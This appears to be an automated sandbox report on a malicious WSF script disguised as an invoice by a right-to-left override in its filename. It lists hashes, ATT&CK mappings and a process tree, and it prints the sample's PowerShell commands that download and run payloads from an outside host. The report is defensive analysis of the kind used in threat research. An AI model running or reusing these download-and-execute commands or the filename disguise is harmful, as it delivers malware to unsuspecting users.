20ca052bc52642c405973b7085edbb40b22aa28d7e781dddc43760097ea58722

Analysis

max time kernel
43s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
13-12-2022 08:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

invoice‮Docx.wsf
Size

617B
MD5

48a775e6dd5d96edafaeac7d785c8d64
SHA1

054eb3ce87682d131b95a22741bcca35b1e1d5d1
SHA256

20ca052bc52642c405973b7085edbb40b22aa28d7e781dddc43760097ea58722
SHA512

bb6eac05b3a1fdc9b169bb8a71f44e2fafa4a95367cf07952776aa781baec46a2f231ccc3c06823aaa1f960ce18e9f0d323b3c1f54cf0d6bca3d9f6e1d857379

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1756 powershell.exe
1292 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1756 powershell.exe
Token: SeDebugPrivilege 1292 powershell.exe

pid	process
1756	powershell.exe
1292	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	1292	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.execmd.execmd.exe

description	pid	process	target process
PID 1988 wrote to memory of 1296	1988	WScript.exe	cmd.exe
PID 1988 wrote to memory of 1296	1988	WScript.exe	cmd.exe
PID 1988 wrote to memory of 1296	1988	WScript.exe	cmd.exe
PID 1296 wrote to memory of 1756	1296	cmd.exe	powershell.exe
PID 1296 wrote to memory of 1756	1296	cmd.exe	powershell.exe
PID 1296 wrote to memory of 1756	1296	cmd.exe	powershell.exe
PID 1988 wrote to memory of 1088	1988	WScript.exe	cmd.exe
PID 1988 wrote to memory of 1088	1988	WScript.exe	cmd.exe
PID 1988 wrote to memory of 1088	1988	WScript.exe	cmd.exe
PID 1088 wrote to memory of 1292	1088	cmd.exe	powershell.exe
PID 1088 wrote to memory of 1292	1088	cmd.exe	powershell.exe
PID 1088 wrote to memory of 1292	1088	cmd.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice‮Docx.wsf"
1⤵
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri http://a0745450.xsph.ru/INVESTMENT.one -OutFile $env:tmp\invoice.one; Start-Sleep -Seconds 1 C:\Users\Admin\AppData\Local\Temp\invoice.one
2⤵
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest -Uri http://a0745450.xsph.ru/INVESTMENT.one -OutFile $env:tmp\invoice.one; Start-Sleep -Seconds 1 C:\Users\Admin\AppData\Local\Temp\invoice.one
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri http://a0745450.xsph.ru/DT6832.exe -OutFile $env:tmp\system32.exe; Start-Sleep -Seconds 1 C:\Users\Admin\AppData\Local\Temp\system32.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest -Uri http://a0745450.xsph.ru/DT6832.exe -OutFile $env:tmp\system32.exe; Start-Sleep -Seconds 1 C:\Users\Admin\AppData\Local\Temp\system32.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1292

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
31dc8882192863d69407647b94108f31

SHA1
19e38bcf551e5e90ef03e8abdda0377dd434a554

SHA256
996263a9e29939a26673545a3273a444235b266d0b8b64d8fda591afa50f218f

SHA512
3c8f9432c672bd02e2f99efc24ea88c821de9084f8904622c3737a6fe931adf3afd45da978b83281a9d0a91347cd31832146196488abbe88aed79f6593da1610

Download Submit
memory/1088-64-0x0000000000000000-mapping.dmp

Download
memory/1292-72-0x00000000026FB000-0x000000000271A000-memory.dmp

Filesize
124KB

Download
memory/1292-71-0x00000000026F4000-0x00000000026F7000-memory.dmp

Filesize
12KB

Download
memory/1292-70-0x00000000026F4000-0x00000000026F7000-memory.dmp

Filesize
12KB

Download
memory/1292-69-0x000007FEF3A00000-0x000007FEF455D000-memory.dmp

Filesize
11.4MB

Download
memory/1292-68-0x000007FEF4560000-0x000007FEF4F83000-memory.dmp

Filesize
10.1MB

Download
memory/1292-65-0x0000000000000000-mapping.dmp

Download
memory/1296-55-0x0000000000000000-mapping.dmp

Download
memory/1756-59-0x000007FEF3060000-0x000007FEF3BBD000-memory.dmp

Filesize
11.4MB

Download
memory/1756-63-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/1756-62-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/1756-61-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

Filesize
3.0MB

Download
memory/1756-60-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/1756-58-0x000007FEF3BC0000-0x000007FEF45E3000-memory.dmp

Filesize
10.1MB

Download
memory/1756-56-0x0000000000000000-mapping.dmp

Download
memory/1988-54-0x000007FEFBF41000-0x000007FEFBF43000-memory.dmp

Filesize
8KB

Download